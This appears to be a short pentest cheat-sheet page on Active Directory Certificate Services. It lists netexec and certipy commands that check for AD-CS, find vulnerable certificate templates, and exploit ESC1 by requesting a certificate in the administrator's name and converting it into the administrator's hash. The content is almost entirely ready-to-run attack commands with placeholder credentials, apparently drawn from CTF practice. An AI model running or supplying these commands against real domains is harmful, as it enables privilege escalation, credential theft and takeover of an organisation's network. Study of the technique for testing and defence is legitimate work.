AD-CS

https://www.thehacker.recipes/ad/movement/adcs/

#Check if AD-CS is available
netexec ldap 'domaincontroller' -d 'domain' -u 'user' -p 'password' -M adcs


#enumerate for a attack vectoris
certipy find -u 'user@domain.local' -p 'password' -dc-ip 'DC_IP' -vulnerable -stdout

ESC 1

#To get certificate for a administrator
certipy req -u user.withpass -p password -target local.htb -upn administrator@local.htb -ca local-dc-ca -template VulnTemplate

#To get a hash for administrator
certipy auth -pfx administrator.pfx

PreviousAzure AD Connect Sync Nextdefaultpool access

Last updated 9 months ago